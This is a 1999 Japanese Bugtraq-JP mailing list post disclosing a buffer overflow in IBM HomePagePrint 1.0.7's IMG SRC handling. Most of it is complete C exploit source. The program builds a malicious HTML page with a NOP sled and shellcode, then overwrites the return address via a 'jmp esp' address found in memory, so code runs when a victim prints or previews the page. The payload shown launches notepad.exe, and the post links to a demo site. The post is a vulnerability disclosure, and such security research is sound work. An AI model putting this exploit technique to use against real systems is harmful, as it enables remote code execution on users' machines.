Return-Path: owner-bugtraq-jp@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-2022-JP
Content-Transfer-Encoding: 7bit
X-Mailer: Becky! ver 1.25.07
Message-ID:  <37EAC43F280.DB39SHADOWPENGUIN@fox.nightland.net>
Date:         Fri, 24 Sep 1999 09:22:23 +0900
Reply-To: UNYUN <shadowpenguin@BACKSECTION.NET>
Sender: BUGTRAQ-JP List <BUGTRAQ-JP@SECURITYFOCUS.COM>
From: UNYUN <shadowpenguin@BACKSECTION.NET>
Subject:      IBM HomePagePrint Overflow Exploit
X-To:         BUGTRAQ-JP@SECURITYFOCUS.COM
To: BUGTRAQ-JP@SECURITYFOCUS.COM

UNYUN@ShadowPenguinSecurityです。

IBM ホームページプリント Ver 1.0.7 (Windows95/98用)
にオーバーフローによるセキュリティホールがあるようです。
IBMに報告しましたが音沙汰がありませんので、Bugtraq-JPにてご報告します。
IMG SRC の処理にバウンドチェック漏れがあり、exploitコードが記述された
サイトを指定して「印刷」もしくは「プレビュー」するとクライアントホスト上
でexploitコードが実行され、トロイの木馬やVirusの感染といった危険性が
あります。
以下がデモサイトです。exploitコードは害のないようクライアントホスト上の
notepad.exe起動となっています。
http://www.geocities.co.jp/SiliconValley-SanJose/7479/exploit.html

/*=============================================================================
   IBM HomePagePrint Version 1.0.7 Exploit for Windows98
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  =============================================================================
*/

#include	<stdio.h>
#include	<windows.h>

#define		EXPLOIT_HTML	"exploit.html"
#define		HOST_ADDR		"http://www.geocities.co.jp/SiliconValley-SanJose/7479/"
#define		EIP				990
#define		JMPS_CODE		0xe9
#define		JMPS_OFS		0xfffff790

unsigned int mems[]={
0xbfb70000,0xbfbfc000,
0xbfde0000,0xbfde6000,
0xbfdf0000,0xbfdf5000,
0xbfe00000,0xbfe10000,
0xbfe30000,0xbfe43000,
0xbfe80000,0xbfe86000,
0xbfe90000,0xbfe96000,
0xbfea0000,0xbfeb0000,
0xbfee0000,0xbfee5000,
0xbff20000,0xbff47000,
0xbff50000,0xbff61000,
0xbff70000,0xbffc6000,
0xbffc9000,0xbffe3000,
0,0};

unsigned char exploit_code[200]={
0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,
0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,
0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,
0xFF,0x00
};
unsigned char cmdbuf[200]="msvcrt.dll.system.notepad.exe";

unsigned int search_mem(FILE *fp,unsigned char *st,unsigned char *ed,
                unsigned char c1,unsigned char c2)
{
    unsigned char   *p;
	unsigned int	adr;

    for (p=st;p<ed;p++)
        if (*p==c1 && *(p+1)==c2){
			adr=(unsigned int)p;
			if ((adr&0xff)==0) continue;
			if (((adr>>8)&0xff)==0) continue;
			if (((adr>>16)&0xff)==0) continue;
			if (((adr>>24)&0xff)==0) continue;
			return(adr);
		}
	return(0);
}

int PASCAL WinMain(HINSTANCE hInst, HINSTANCE hInstPrev, LPSTR pszCmdLine, int CmdShow)
{
	FILE					*fp;
	unsigned int			i,ip,eip;
	static unsigned char	buf[30000];

	if ((fp=fopen(EXPLOIT_HTML,"wb"))==NULL) return FALSE;
	fprintf(fp,"<HTML><IMG SRC=\"");

	memset(buf,'a',2000); buf[2000]=0;
	for (i=0;i<50;i++) buf[i]=0x90;
	strcat(exploit_code,cmdbuf);
	memcpy(buf+50,exploit_code,strlen(exploit_code));

    for (i=0;;i+=2){
		if (mems[i]==0) return FALSE;
		if ((ip=search_mem(fp,(unsigned char *)mems[i],
			(unsigned char *)mems[i+1],0xff,0xe4))!=0) break;
    }

	eip=EIP-strlen(HOST_ADDR);
	buf[eip  ]=ip&0xff;
	buf[eip+1]=(ip>>8)&0xff;
	buf[eip+2]=(ip>>16)&0xff;
	buf[eip+3]=(ip>>24)&0xff;

	ip=JMPS_OFS;
	buf[eip+4]=JMPS_CODE;
	buf[eip+5]=ip&0xff;
	buf[eip+6]=(ip>>8)&0xff;
	buf[eip+7]=(ip>>16)&0xff;
	buf[eip+8]=(ip>>24)&0xff;

	fwrite(buf,2000,1,fp);

	fprintf(fp,"\"></HTML>");
	fclose(fp);
	return FALSE;
}



-----
 The Shadow Penguin Security (http://shadowpenguin.backsection.net)
 Webmaster / UNYUN (shadowpenguin@backsection.net)